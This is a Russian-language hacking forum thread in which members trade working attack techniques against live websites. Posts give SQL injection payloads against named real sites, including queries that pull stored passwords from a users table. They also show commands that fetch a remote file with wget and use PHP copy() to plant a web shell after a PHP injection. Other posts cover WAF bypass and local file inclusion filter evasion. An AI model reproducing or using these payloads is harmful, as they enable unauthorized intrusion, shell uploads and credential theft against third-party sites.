Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. kingbeef

    kingbeef Reservists Of Antichat

    Joined:
    8 Apr 2010
    Messages:
    367
    Likes Received:
    164
    Reputations:
    126
    news.php?id=0 union select 1,2,3,4,5,6,7,8,group_concat(%74able_name) from information_schema.tables

    Так попробуй,а лучше выложи ссыль.
     
    _________________________
    #21321 kingbeef, 2 Nov 2012
    Last edited: 2 Nov 2012
  2. CoBecTb

    CoBecTb New Member

    Joined:
    12 Aug 2012
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Извините плз, возможно ли реализовать эту инъекцию через wappex?
    Если да, то объясните в 2х словах или подробно если не сложно.
    Ещё раз извиняюсь за назойливость.
     
  3. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    http://www.artsnspirits.com/quick-signup.php?eventid=0%20union%20select%201,2,3,4,5,6,7,8,9
    принтабльный парметр - 6
     
  4. Cennarios

    Cennarios Elder - Старейшина

    Joined:
    13 Jul 2008
    Messages:
    378
    Likes Received:
    179
    Reputations:
    108

    http://www.artsnspirits.com/quick-signup.php?eventid=0+union+select+1,2,3,4,5,hex(table_name),7,8,9+from+information_schema.tables+limit+16,1--+

    Дальше сам.
     
    1 person likes this.
  5. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Раскрутил, спасибо всем кто откликнулся.
     
    #21325 MaxFast, 4 Nov 2012
    Last edited: 4 Nov 2012
  6. vaddd

    vaddd Member

    Joined:
    6 Jan 2009
    Messages:
    140
    Likes Received:
    19
    Reputations:
    9
    id=(1)and(select 1 from(select count(*),concat((SELECT user_password from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--

    Subquery returns more than 1 row

    В чем трабл? имена колонок и таблиц таким способом узнал, а данные не извлекаются :(
     
  7. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75

    PHP:
    id=(1)and(select 1 from(select count(*),concat((SELECT substr(user_password,1,99from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--
     
    1 person likes this.
  8. OxoTnik

    OxoTnik На мышей

    Joined:
    10 Jun 2011
    Messages:
    943
    Likes Received:
    525
    Reputations:
    173
    Можно отредактировать шаблон
    Можно в папке wp-includes полазить и посмотреть какие из них инклудятся на главную страницу, и отредактировать его
     
  9. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
    такие команды выполняються
    system('ls -la');
    system('rmdir hack');
    system('mkdir hack');
    system('id');
    а вот
    system('wget http://goomihas.narod.ru/testing.php')
     
  10. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    воспользуйся пхп функцией copy();
    пример:
    PHP:
    copy("http://localhost/shell.txt","tmp/shell.php");
     
    _________________________
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    слабо читать учебник по linux?

    кури маны curl,wget,lynx, если система BSD то (fetch)
     
    _________________________
  12. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Спасибо.Параметр fetch помог.Konqi где можна скачать хорошие маны?
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    в гугле
     
    _________________________
  14. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    Помогите со скулей, никак не получается из-за WAF
    http://www.paladins.ru/deskart.php?cat=4&conk=-1
     
  15. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    117
    Likes Received:
    29
    Reputations:
    26
    1) Проверяет наличие инъекции, т.к. and 1 = 1 возвращает истину, а and 1 > 1 - ложь, отсюда меняется размер или содержание страницы и т.о. проверяется наличие инъекции.
    2)
    Комментарии /*!int */ в котором, всё заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше.
    Code:
    SELECT pass/*!32302 ,login*/FROM users
    Выведет столбец login если версия MySQL равна либо выше 3.23.02
     
    #21335 Ravenous, 7 Nov 2012
    Last edited: 7 Nov 2012
    1 person likes this.
  16. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    LFI

    что делать?
     
  17. Prosta4ok

    Prosta4ok New Member

    Joined:
    25 Oct 2012
    Messages:
    61
    Likes Received:
    0
    Reputations:
    0
    зачем кавычка в начале? да и вообще не факт что там есть LFI
     
  18. ReV0LVeR

    ReV0LVeR Banned

    Joined:
    3 May 2011
    Messages:
    30
    Likes Received:
    5
    Reputations:
    1
    Prosta4ok , для того что-бы видеть ошибку. Проблема ни в том что уязвимости нет, проблема в фильтрации переменных. не фильтрует ":!@" и еще пару символов.
    поэтому не получается подняться на каталоги выше.
    Вопрос кто работал с протоколом "data:"
    Есть возможность использовать его при LFI?
    Какие еще варианты обхода фильтрации при локальном инклуде?
     
  19. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    117
    Likes Received:
    29
    Reputations:
    26
    Ну в mysql если параметр число, то тип числовой,если строка то строковой, как правило. Логично же?) В факе от Dr. Zero(на рдоте) всё описано и разжёвано, как определять sqli и прочие. Если числовой тип, то делай ?id=5-1, если есть инъекция, и не фильтруется минус, то выведется 4-ая новость или т.п.
    Алгоритм выведешь на основе своей практики. Читайте больше, всё разжёвано.
    Чтобы использовать wrappers, нужно чтобы до переменной в функции ничего небыло(пути). Типо include ($_GET['p'].'.php');
    В твоём случае не получится.
     
    #21339 Ravenous, 8 Nov 2012
    Last edited: 8 Nov 2012
  20. MaxFast

    MaxFast Elder - Старейшина

    Joined:
    12 Oct 2011
    Messages:
    575
    Likes Received:
    149
    Reputations:
    94
    Как обойти редирект на index.php при MySQL ошибке?
    Выключение редиректа в браузере не помогает.
     
Thread Status:
Not open for further replies.